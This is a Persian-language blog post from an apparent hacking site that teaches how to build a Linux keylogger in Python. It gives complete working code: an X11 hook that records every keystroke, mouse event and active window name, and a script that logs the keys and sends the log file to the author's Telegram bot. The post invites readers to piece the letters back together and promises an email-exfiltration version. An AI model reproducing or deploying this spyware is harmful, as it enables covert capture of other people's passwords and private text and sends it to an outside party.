آموزش ساخت کی لاگر با پایتون :: V i R u s Ʒ²

V i R u s Ʒ²

هک و امنیت

V i R u s Ʒ²

هک و امنیت

Virus 32

💢 دوستانم بی دفاع و دشمنانم بی جواب نخواهند ماند 💢

-->
آخرین نظرات

قبلا در مورد ساخت کی لاگر ویندوز و وب پست منتشر کرده بودیم ، اما تو این پست میخوایم بپردازیم به آموزش ساخت کی لاگر لینوکسی با استفاده از پایتون که بصورت پیشفرض توی لینوکس نصب شده و نیازی نیست که مجدد نصبش کنیم و در آخر هم لاگ های ذخیره شده رو میفرستیم به ربات تلگرام ، خب بریم سر اصل مطلب

اول از همه باید کتابخونه های مورد نیاز رو نصب کنیم که برای اینکار لینوکس خودتون رو استارت کنین و به ترتیب دستورات پایین رو توی ترمینال لینوکسی وارد کنین تا از نظر کتابخونه بی نیاز بشیم

pip install Xlib

بعد از اینکه این دستور رو زدیم ، منتظر میمونیم تا کتابخونه دانلود و نصب بشه و بعد از اینکه تموم شد دستور پایین رو میزنیم تا کتابخونه ی دوم مورد نظرمون نصب بشه

pip install python-telegram-bot

خب این از کتابخونه های مورد نیازمون ، بعدش وارد این پست میشیم و یاد میگیریم که چطور باید یه ربات رو بسازیم و به یوزر آی دی و... خودمون دست پیدا کنیم و بعدش بر میگردیم به ادامه ی همین پست

خب حالا یه پوشه روی دسکتاپ ایجاد میکنیم و سه تا فایل با اسم های زیر داخلش میسازیم 

1- یه فایل با نام hook.py

2- یه فایل دیگه به نام keylogger.py

3- در آخر هم یه فایل با اسم file.log

خب بعد از اینکه ساختیم ، به ترتیب فایل هارو ویروایش میکنیم که برای اینکار توی لینوکس میتونیم راست کلیک کنیم رو فایل و گزینه ی ویرایش با ویرایشگر متنی رو بزنیم

اول فایل hook.py رو ویرایش میکنیم و بعد از اینکه کدارو کپی کردیم داخلش ، سیو میکنیم و میریم برای فایل بعدی

from __future__ import print_function

import sys
import re
import time
import threading

from Xlib import X, XK, display
from Xlib.ext import record
from Xlib.protocol import rq


class HookManager(threading.Thread):
  """ 
  This is the main class. Instantiate it, and you can hand it KeyDown
  and KeyUp (functions in your own code) which execute to parse the
  PyxHookKeyEvent class that is returned.

  This simply takes these two values for now:
  KeyDown : The function to execute when a key is pressed, if it
       returns anything. It hands the function an argument that
       is the PyxHookKeyEvent class.
  KeyUp  : The function to execute when a key is released, if it
       returns anything. It hands the function an argument that is
       the PyxHookKeyEvent class.
  """

  def __init__(self):
    threading.Thread.__init__(self)
    self.finished = threading.Event()
    self.mouse_position_x = 0
    self.mouse_position_y = 0
    self.ison = {"shift": False, "caps": False}
    self.isshift = re.compile('^Shift')
    self.iscaps = re.compile('^Caps_Lock')
    self.shiftablechar = re.compile('|'.join((
      '^[a-z0-9]$',
      '^minus$',
      '^equal$',
      '^bracketleft$',
      '^bracketright$',
      '^semicolon$',
      '^backslash$',
      '^apostrophe$',
      '^comma$',
      '^period$',
      '^slash$',
      '^grave$'
    )))
    self.logrelease = re.compile('.*')
    self.isspace = re.compile('^space$')
    self.KeyDown = lambda x: True
    self.KeyUp = lambda x: True
    self.MouseAllButtonsDown = lambda x: True
    self.MouseAllButtonsUp = lambda x: True
    self.MouseMovement = lambda x: True

    self.contextEventMask = [X.KeyPress, X.MotionNotify]
    self.local_dpy = display.Display()
    self.record_dpy = display.Display()

  def run(self):

    if not self.record_dpy.has_extension("RECORD"):
      print("RECORD extension not found", file=sys.stderr)
      sys.exit(1)
    self.ctx = self.record_dpy.record_create_context(
      0,
      [record.AllClients],
      [{
        'core_requests': (0, 0),
        'core_replies': (0, 0),
        'ext_requests': (0, 0, 0, 0),
        'ext_replies': (0, 0, 0, 0),
        'delivered_events': (0, 0),
        'device_events': tuple(self.contextEventMask),
        'errors': (0, 0),
        'client_started': False,
        'client_died': False,
      }])

    self.record_dpy.record_enable_context(self.ctx, self.processevents)
    self.record_dpy.record_free_context(self.ctx)

  def cancel(self):
    self.finished.set()
    self.local_dpy.record_disable_context(self.ctx)
    self.local_dpy.flush()

  def printevent(self, event):
    print(event)

  def HookKeyboard(self):
pass def HookMouse(self): """ We don't need to do anything here anymore, since the default mask is now set to contain X.MotionNotify """ pass def processevents(self, reply): if reply.category != record.FromServer: return if reply.client_swapped: print("* received swapped protocol data, cowardly ignored") return try: intval = ord(reply.data[0]) except TypeError: intval = reply.data[0] if (not reply.data) or (intval < 2): return data = reply.data while len(data): event, data = rq.EventField(None).parse_binary_value( data, self.record_dpy.display, None, None ) if event.type == X.KeyPress: hookevent = self.keypressevent(event) self.KeyDown(hookevent) elif event.type == X.KeyRelease: hookevent = self.keyreleaseevent(event) self.KeyUp(hookevent) elif event.type == X.ButtonPress: hookevent = self.buttonpressevent(event) self.MouseAllButtonsDown(hookevent) elif event.type == X.ButtonRelease: hookevent = self.buttonreleaseevent(event) self.MouseAllButtonsUp(hookevent) elif event.type == X.MotionNotify: hookevent = self.mousemoveevent(event) self.MouseMovement(hookevent) def keypressevent(self, event): matchto = self.lookup_keysym( self.local_dpy.keycode_to_keysym(event.detail, 0) ) if self.shiftablechar.match( self.lookup_keysym( self.local_dpy.keycode_to_keysym(event.detail, 0))): if not self.ison["shift"]: keysym = self.local_dpy.keycode_to_keysym(event.detail, 0) return self.makekeyhookevent(keysym, event) else: keysym = self.local_dpy.keycode_to_keysym(event.detail, 1) return self.makekeyhookevent(keysym, event) else: keysym = self.local_dpy.keycode_to_keysym(event.detail, 0) if self.isshift.match(matchto): self.ison["shift"] = self.ison["shift"] + 1 elif self.iscaps.match(matchto): if not self.ison["caps"]: self.ison["shift"] = self.ison["shift"] + 1 self.ison["caps"] = True if self.ison["caps"]: self.ison["shift"] = self.ison["shift"] - 1 self.ison["caps"] = False return self.makekeyhookevent(keysym, event) def keyreleaseevent(self, event): if self.shiftablechar.match( self.lookup_keysym( self.local_dpy.keycode_to_keysym(event.detail, 0))): if not self.ison["shift"]: keysym = self.local_dpy.keycode_to_keysym(event.detail, 0) else: keysym = self.local_dpy.keycode_to_keysym(event.detail, 1) else: keysym = self.local_dpy.keycode_to_keysym(event.detail, 0) matchto = self.lookup_keysym(keysym) if self.isshift.match(matchto): self.ison["shift"] = self.ison["shift"] - 1 return self.makekeyhookevent(keysym, event) def buttonpressevent(self, event): return self.makemousehookevent(event) def buttonreleaseevent(self, event): return self.makemousehookevent(event) def mousemoveevent(self, event): self.mouse_position_x = event.root_x self.mouse_position_y = event.root_y return self.makemousehookevent(event) def lookup_keysym(self, keysym): for name in dir(XK): if name.startswith("XK_") and getattr(XK, name) == keysym: return name.lstrip("XK_") return "[{}]".format(keysym) def asciivalue(self, keysym): asciinum = XK.string_to_keysym(self.lookup_keysym(keysym)) return asciinum % 256 def makekeyhookevent(self, keysym, event): storewm = self.xwindowinfo() if event.type == X.KeyPress: MessageName = "key down" elif event.type == X.KeyRelease: MessageName = "key up" return PyxHookKeyEvent( storewm["handle"], storewm["name"], storewm["class"], self.lookup_keysym(keysym), self.asciivalue(keysym), False, event.detail, MessageName ) def makemousehookevent(self, event): storewm = self.xwindowinfo() if event.detail == 1: MessageName = "mouse left " elif event.detail == 3: MessageName = "mouse right " elif event.detail == 2: MessageName = "mouse middle " elif event.detail == 5: MessageName = "mouse wheel down " elif event.detail == 4: MessageName = "mouse wheel up " else: MessageName = "mouse {} ".format(event.detail) if event.type == X.ButtonPress: MessageName = "{} down".format(MessageName) elif event.type == X.ButtonRelease: MessageName = "{} up".format(MessageName) else: MessageName = "mouse moved" return PyxHookMouseEvent( storewm["handle"], storewm["name"], storewm["class"], (self.mouse_position_x, self.mouse_position_y), MessageName ) def xwindowinfo(self): try: windowvar = self.local_dpy.get_input_focus().focus wmname = windowvar.get_wm_name() wmclass = windowvar.get_wm_class() wmhandle = str(windowvar)[20:30] except: return {"name": None, "class": None, "handle": None} if (wmname is None) and (wmclass is None): try: windowvar = windowvar.query_tree().parent wmname = windowvar.get_wm_name() wmclass = windowvar.get_wm_class() wmhandle = str(windowvar)[20:30] except: return {"name": None, "class": None, "handle": None} if wmclass is None: return {"name": wmname, "class": wmclass, "handle": wmhandle} else: return {"name": wmname, "class": wmclass[0], "handle": wmhandle} class PyxHookKeyEvent: """ This is the class that is returned with each key event.f It simply creates the variables below in the class. Window : The handle of the window. WindowName : The name of the window. WindowProcName : The backend process for the window. Key : The key pressed, shifted to the correct caps value. Ascii : An ascii representation of the key. It returns 0 if the ascii value is not between 31 and 256. KeyID : This is just False for now. Under windows, it is the Virtual Key Code, but that's a windows-only thing. ScanCode : Please don't use this. It differs for pretty much every type of keyboard. X11 abstracts this information anyway. MessageName : "key down", "key up". """ def __init__( self, Window, WindowName, WindowProcName, Key, Ascii, KeyID, ScanCode, MessageName): self.Window = Window self.WindowName = WindowName self.WindowProcName = WindowProcName self.Key = Key self.Ascii = Ascii self.KeyID = KeyID self.ScanCode = ScanCode self.MessageName = MessageName def __str__(self): return '\n'.join(( 'Window Handle: {s.Window}', 'Window Name: {s.WindowName}', 'Window\'s Process Name: {s.WindowProcName}', 'Key Pressed: {s.Key}', 'Ascii Value: {s.Ascii}', 'KeyID: {s.KeyID}', 'ScanCode: {s.ScanCode}', 'MessageName: {s.MessageName}', )).format(s=self) class PyxHookMouseEvent: """ This is the class that is returned with each key event.f It simply creates the variables below in the class. Window : The handle of the window. WindowName : The name of the window. WindowProcName : The backend process for the window. Position : 2-tuple (x,y) coordinates of the mouse click. MessageName : "mouse left|right|middle down", "mouse left|right|middle up". """ def __init__( self, Window, WindowName, WindowProcName, Position, MessageName): self.Window = Window self.WindowName = WindowName self.WindowProcName = WindowProcName self.Position = Position self.MessageName = MessageName def __str__(self): return '\n'.join(( 'Window Handle: {s.Window}', 'Window\'s Process Name: {s.WindowProcName}', 'Position: {s.Position}', 'MessageName: {s.MessageName}', )).format(s=self)

خب حالا فایل keylogger.py رو ویرایش میکنیم و مجددا بعد از اینکه کدای زیر رو کپی کردیم داخلش شروع میکنیم به ویرایش توکن ربات و یوزر آی دی که من رنگشونو با قرمز اینجا نوشتم تا بعد از اینکه شما مشخصات دریافت شده از ربات های تلگرامی رو انجام دادین ، تو کداتون بنویسین

from telegram.ext import Updater
from telegram.ext import CommandHandler
import hook

updater = Updater(token='TOKEN')
dispatcher = updater.dispatcher

log_file='file.log'
def sss(event):
  fob=open(log_file,'a')

  fob.write(event.Key)

  fob.write('\n')

  if event.Ascii==96:
    fob.close()
    new_hook.cancel()
def start(bot, update):

  d = open(log_file,'rb')
  bot.sendDocument(chat_id = NumberID, document = d)
  
ms = CommandHandler('start',start)
dispatcher.add_handler(ms)

new_hook=hook.HookManager()

new_hook.KeyDown=sss

new_hook.HookKeyboard()

new_hook.start()
updater.start_polling()
updater.idle()

خب حالا تو پوشه ای که فایل هارو ساختیم راست کلیک میکنیم و گزینه ی Open in Terminal رو میزنیم و بعدش دستور زیر رو برای اجرا شدن کدمون مینویسیم تا برناممون ران یا همون اجرا بشه

python keylogger.py

حالا هر چی که تایپ کنیم داخل فایل file.log ذخیره میشه و زمانی که به مقدار مشخص شده تو کد ها برسه ، برای رباتی که براش کد نوشتیم ، ارسال میشه

نکته --> کدارو طوری طراحی کردم که وقتی متنی تایپ میشه یا ... حروف بصورت خط به خط بشه مثلا من اگه بنویسم ifconfig ، لاگ ما به این شکل در میاد

i
f
c
o
n
f
i
g

حالا اینارو چیکار کنیم ؟ خیلی راحت کنار هم قرار میدیم تا ببینیم چی بدست میاد که خودتون اینو بهتر از من میدونین 

برای بسته شدن برنامه هم کافیه ترمینال لینوکس رو ببندیم تا ذخیره لاگ ها متوقف بشه 

راستی تو پست های بعدی در مورد ارسال ایمیل با پایتون قراره پست بزارم که میتونین ترکیب کنین و اگه نمیخواین لاگ ها به ربات ارسال بشه ، بصورت فایل بفرستین برای ایمیلتون

موفق باشید

نظر (۰)

بدون نظر
ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
شما میتوانید از این تگهای html استفاده کنید:
<b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
تجدید کد امنیتی